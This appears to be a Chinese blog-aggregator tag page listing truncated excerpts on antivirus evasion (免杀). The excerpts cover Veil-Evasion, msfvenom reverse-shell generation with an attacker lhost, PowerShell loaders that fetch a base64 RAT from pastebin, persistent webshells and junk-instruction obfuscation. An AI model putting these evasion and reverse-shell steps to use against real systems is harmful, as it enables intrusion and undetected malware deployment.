E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
veil免杀
第五章 花指令与
免杀
读书笔记
1为了保护真正的果实,所以使用花朵是别人迷惑.花指令不是加密代码,它分两种:a夹杂运行b高级语言的花指令应用,程序在运行时会因为花指令而改变原有的流程.该书暂不涉及,据称"比较复杂且效果有限"2脚本木马花指令3花指令根基-汇编语言a认识汇编80x86汇编大致可分为这么几个功能组:数据传输指令逻辑运算指令串操作指令控制转移指令处理器控制指令b增加反汇编添加任意功能:知识点:汇编调用API函数遵循sd
dalerkd
·
2020-08-16 12:13
苦行僧之路
读书笔记
Metasploit使用后门程序渗透Windows
终端中运行
veil
-evasion输入list查看可用模块这里使用7)c/shellcode_inject/flatc输入use7generate1(default)回车选择默认的windows/meterpreter
盗才生
·
2020-08-16 11:23
kali
msf
Web渗透之MSF框架——msfvenom与
免杀
木马制作
文章目录生成常见的反向连接木马反向连接的优势:Windows:Linux:MAC:PHP:Asp:Aspx:msfvenom参数介绍生成
免杀
木马360
免杀
木马腾讯管家
免杀
木马
免杀
木马测试写在最后生成常见的反向连接木马连接一般分为正向连接和反向连接
Mr. Wanderer
·
2020-08-16 11:17
木马
免杀
之汇编花指令技巧
木马
免杀
之汇编花指令技巧作者:逆流风(发表于《黑客X档案》07.07,转载注明出处)相信很多朋友都做过木马
免杀
,早期的
免杀
都是加壳和改特征码,现在
免杀
技术已经发展到花指令
免杀
,改壳之类的,而这些需要一定的汇编知识
weixin_30730151
·
2020-08-16 11:16
[远控
免杀
]msf生成木马的信息储备
1.msfvenom的命令使用Options:-p,--payload指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l,--list[module_type]列出指定模块的所有可用资源.模块类型包括:payloads,encoders,nops,all-n,--nopsled为payload预先指定一个NOP滑动长
千^里
·
2020-08-15 07:53
剑在手
天下走
DeFi热潮背后仍问题重重,生态逐渐完善的原力协议能否成为“破局者”?
曾经热极一时的DeFi明星项目Dharma更是关闭了全部产品的运行,由Paradigm、红杉资本等投资的
Veil
也在2019年7月宣布关闭。
baidu_39383304
·
2020-08-15 05:24
远控软件GHOST源码
免杀
远控软件gh0st源码
免杀
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马
免杀
工作。
HEJSCLK
·
2020-08-13 14:11
黑客技术
cobalt strike木马
免杀
0x001-针对powershell
免杀
工具:Invoke-Obfuscation操作实例:1、利用CS生成powershell木马2、进入invoke-Obsfuscation文件,使用powershell
shinyruo开始了
·
2020-08-12 16:29
免杀
技术有一套(
免杀
方法大集结)(Anti-AntiVirus)
00.概述什么是
免杀
?
anhkgg
·
2020-08-11 21:02
原创
Windows
汇编"
免杀
"基础知识
一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码就是机器码.修改程序时必须通过修改机器码来修改exe文件.二.需要熟练掌握的全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了cmpa,b比较a与bmova,b把b的值送给aret返回主程序nop无作
艾伦之家
·
2020-08-11 11:54
安全
黑客
渗透测试之权限维持
Web后门1:隐藏后门文件(将文件设置为隐藏)2:不死马,该脚本每5秒向服务器创建test.php,并写入一句话
免杀
木马。结合attrib命令隐藏文件更好地建立后门。"
QingChenHT
·
2020-08-11 10:35
渗透测试-权限维持
入侵局域网的全攻略
入侵工具:一般要用到三个:NTscan变态扫描器,Recton--D贺
免杀
专用版,DameWare迷你中文版4.5.
清水迎朝阳
·
2020-08-10 21:45
黑客技术
远控
免杀
专题 14 ---AVIator
0x01
免杀
能力一览表几点说明:1、上表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
go0dStudy
·
2020-08-10 20:40
免杀专题
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
JS脚本木马之所以会如此泛滥,与它的编写简单、易于
免杀
以及难以封堵等特点息息相关。而我们本次的课程也会围绕它的这三个
ioio_jy
·
2020-08-10 09:07
病毒木马查杀实战
木马
免杀
基础学习
参考书籍:《木马攻防全攻略》--万立夫编著--电脑报电子音像出版社参考链接:https://www.52pojie.cn/thread-32064-1-1.html推荐的
免杀
思路链接:http://www.cnhonkerarmy.com
fa1lr4in
·
2020-08-07 23:42
免杀
基于PowerShll的
免杀
思路,过国外主流杀毒
1)首先准备一个你的RAT小马,可以是任何exe后缀的文件2)使用工具将exe转换为Base64格式3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Injecttopowershell.vbsCreateObject("WScript.Shell").Run"PowerShel
FFE4
·
2020-08-07 23:27
心情杂货铺
利用Office公式编辑器特殊处理逻辑的
免杀
技术分析(CVE-2017-11882)
利用Office公式编辑器特殊处理逻辑的
免杀
技术分析(CVE-2017-11882)阅读量44989|评论3分享到:发布时间:2018-09-1110:00:14背景2018年8月24日,360威胁情报中心捕获到一个专门为乌克兰语使用者设计的钓鱼文档
betteroneisme
·
2020-08-07 23:12
【
免杀
篇】远控
免杀
专题(22)-SpookFlare
免杀
(VT
免杀
率16/67)
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01SpookFlare介绍0x02安装SpookFlare0x03SpookFlare使用说明0x04利用SpookFlare生成后门0x05SpookFlare小结
免杀
能力一览表
Agan '
·
2020-08-07 23:17
免杀篇
【
免杀
篇】远控
免杀
专题(53)-白名单WMIC.exe执行payload
当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01WMIC介绍0x02WMIC使用0x03使用WMIC远程加载payload利用metasploit自定义
免杀
0x01WMIC介绍WMIC扩展
Agan '
·
2020-08-07 23:17
免杀篇
java webshell jsp 木马攻防 简介
目录基础知识JSP标签JSP中的字符串混淆方式类反射类加载对命令执行JSP一句话
免杀
原型类反射绕过寻找其他类对于冰蝎JSP一句话的
免杀
免杀
D盾
免杀
百度scanner总结防范方法其他类型的webshell
whatday
·
2020-08-06 13:32
捆绑后门的艺术--CobaltStrike backdoor分析
其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及
免杀
效果。下面,就来剖析一下该类后门的捆绑及
免杀
原理。
systemino
·
2020-08-05 11:56
使用MSF生成的shellcode打造
免杀
payload
环境:1.Kali攻击机IP:192.168.114.1402.使用win7生成exe步骤:使用msfvenom生成shellcode:msfvenom-pwindows/meterpreter/reverse_httplhost=192.168.114.140lport=5555-fcwin7中使用Visualstudio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):选择空项
zkwniky
·
2020-08-04 22:04
渗透测试
第十六章
免杀
.防病毒软件▪恶意程序最主要的防护手段–杀毒软件/防病毒软件–客户端/服务端/邮件防病毒▪检测原理–基于二进制文件中特征签名的黑名单检测方法–基于行为的分析方法(启发式)▪事后手段–永远落后于病毒发展
免杀
技术
baihuang8062
·
2020-08-04 13:27
nps内网渗透利用
0x00前言对比了比较多的代理工具,如ew流量不稳定,容易断;frsocks目前
免杀
,也是容易断。frp需要落地配置文件,不符合渗透的规则。reg正向的socks,速度比较慢,扫描是个问题。
weixin_30883311
·
2020-08-02 19:14
【
免杀
篇】远控
免杀
专题(31)-powershell加载shellcode
免杀
-4种方式(VT
免杀
率5-58)
加载shellcode介绍0x02powershell的几个基础知识powershell版本问题常见执行方式执行策略0x03powershell加载shellcode方法1:msf-ps1本地执行(VT
免杀
率
Agan '
·
2020-08-02 15:07
免杀篇
Powershell Empire 绕过AV实现远控
虽然这款框架集成了从漏洞发现到漏洞利用的几乎所有功能,但是不得不承认其在木马后门的
免杀
方面现如今已经不足以应付一些流氓杀软了。但是,PowershellEmpire可以。
weixin_34037977
·
2020-08-02 14:33
操作系统
python
shell
empire用法笔记
其中集成了很多内网的一些工具以及命令,使用方便,且empire生成的木马文件基于powershell,所以在windows平台上有很好的
免杀
效果。结合msf使用更是如虎添翼。
aFa攻防实验室
·
2020-08-02 13:45
渗透测试
Kali
msf
[源码和文档分享]基于VC++的WIN32 API界面编程实现的百战天虫小游戏
HERO阵营的目标为阻止精灵继续逍遥法外,但是为了保护珍稀精灵,HERO需要尽量避
免杀
死精灵,并且收服精灵。WIZARD阵营的目标为杀死HERO阵
ggdd5151
·
2020-08-01 07:26
通过xencrypt
免杀
invoke-mimikatz.ps1
0x01简介xencrypt目前测试只在windows2012powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。0x02使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltratio
`GGyao
·
2020-07-30 15:15
免杀
如何在目标内网中发现更多存活主机
win下进行各种arp扫描:1#start/barpscan.exe-t192.168.3.0/24>>result.txt利用powershell脚本进行arp扫描,这也是个人比较推荐的方式,轻量且
免杀
效果较
weixin_30305735
·
2020-07-30 12:46
柳宗元的高级隐喻故事:《种树郭囊驼传》顺从人的天性,自然发展
左传战国策,很多士大夫再劝谏国君的时候都是大量的都是大量的引用寓言故事,以避
免杀
身之祸,取得了非常好的劝谏的效果。
正念教练张林宝
·
2020-07-30 11:20
病毒知识与常见杀毒软件了解
病毒常用的
免杀
技术加壳加花变种升级杀毒引擎杀毒引擎的任务:对指定的文件或程序进行判断是否合法。脱壳分为硬脱壳和动态脱壳虚拟机脱壳引擎技
weixin_30929195
·
2020-07-30 02:24
区块链
CrypMic分析报告
通过函数返回地址+函数第一个参数来确定跳转到的地址,这里主要用于
免杀
和增加逆向分析难度。释放恶意代码。多次跳转后到达PE解密的地方,首先从第一个区段中获取到用于PE替换的数据
weixin_30527143
·
2020-07-30 02:39
TideSec远控
免杀
学习四(BackDoor-Factory+Avet+TheFatRat)
参考资料利用BDF向EXE文件植入后门:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/backdoor-factory使用简介:https://www.lstazl.com/
fa1lr4in
·
2020-07-29 09:12
免杀
教你制作一个木马
免杀
的360
制作一个360
免杀
的木马我们用到工具:kail:利用msfvenom(美少妇)MSFvenom的常用命令1、我们进入到msf里面在msf后生成一个exe的木马文件,这-p就是生成window模块playload
EdisonJH
·
2020-07-29 09:39
kail
黑客工具使用
PHP一句话木马
免杀
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马
免杀
小技巧
免杀
小技巧1.字符串拼接方式,构造敏感函数。
小刚127.0.0.1
·
2020-07-29 08:52
Web安全笔记
代码审计
一句话木马
免杀
从webshell开始的内网入侵
对内网入侵的一个小总结,大多是参考一叶知安的文章:一次完整的从webshell到域控的探索之路正文开始:大体思路:
免杀
payload的生成,请使用Veilmsf在meterpreter下的提权尝试msf
逝之君
·
2020-07-29 02:57
渗透测试
20169205 2016-2017-2 《网络攻防技术》
免杀
技术
201692052016-2017-2《网络攻防技术》
免杀
技术一、基础问题回答(1)杀软是如何检测出恶意代码的?
weixin_30849591
·
2020-07-28 17:19
IIS7.0、7.5解析漏洞利用
建议使用
免杀
马(3)上传WebShell上传制作好的websh
L_KevinK
·
2020-07-27 16:03
Web渗透
木马源代码
免杀
处理
木马源代码
免杀
处理------------------------------------------有加这样
免杀
的:------------------------------------------
p123456789p
·
2020-07-16 04:13
优化
Flash水坑钓鱼
以后肯定用的到准备flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn一个服务器一个域名一个马子先配置一个马子吧使用常用的CS吧,随便来一个,成功上线关于
免杀
god_zZz
·
2020-07-15 23:15
WEB
漏洞复现和分析
免杀
原理与实践——使用msfvenom与
veil
绕过杀毒软件
免杀
原理与实践——使用msfvenom与
veil
绕过杀毒软件这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。
Y_F_Wang
·
2020-07-15 10:05
信息安全素质教育与实践
远控
免杀
专题(5)-
Veil
免杀
(VT
免杀
率23/71)
本专题文章导航1、远控
免杀
专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控
免杀
专题(2)-msfvenom隐藏的参数:https
shuteer_xu
·
2020-07-14 22:28
veil
-evasion介绍
veil
-evasion简介
veil
-evasion是linux平台的一款
免杀
工具,可直接通过apt-get安装,用来生成msf的payload,能绕过常见的杀软。
mcc3210
·
2020-07-14 21:34
信息安全
Veil
-Evasion
免杀
Veil
-Evasion简介
Veil
-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多数的杀软。
a阿飞
·
2020-07-14 20:07
网络安全
veil
-Evasion
免杀
使用
veil
-Evasion
免杀
使用
Veil
-Evasion是
Veil
-Framework框架的一部分,也是其主要的项目。
卿's Blog
·
2020-07-14 16:48
安全漏洞--基于NDAY和0DAY漏洞
免杀
技巧
一概念简介0day中的0表示zero,早期的0day表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。0day是一个统称,所有的破解都可以叫0day。简而言之,0day就是代表还没有公开的漏洞,nday就是代表已经公开了的漏洞。漏洞开发者在利用0day和Nday时,除了在逃过windos的自身安全机
5t4rk
·
2020-07-14 08:28
漏洞学习
二进制
安全札记
技术文章
网络安全与恶意代码
利用MSBuild制作msf
免杀
的后门
,http://bobao.360.cn/learning/detail/3046.html,说可以有提供一种直接执行shellcode的方法,然后就尝试了一下通过MSBuild进行msf的木马后门的
免杀
ZZZJX7
·
2020-07-14 06:36
免杀
后门之MSF&
Veil
-Evasion的完美结合
本文由“即刻安全”投稿到“玄魂工作室”
Veil
-Evasion是
Veil
-Framework框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的payload!
xuanhun
·
2020-07-14 03:15
渗透测试
玄魂工作室
安全
免杀
metasploit
免杀
后门之MSF&
Veil
-Evasion的完美结合
本文由“即刻安全”投稿到“玄魂工作室”
Veil
-Evasion是
Veil
-Framework框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的payload!
weixin_33749242
·
2020-07-13 17:16
上一页
8
9
10
11
12
13
14
15
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他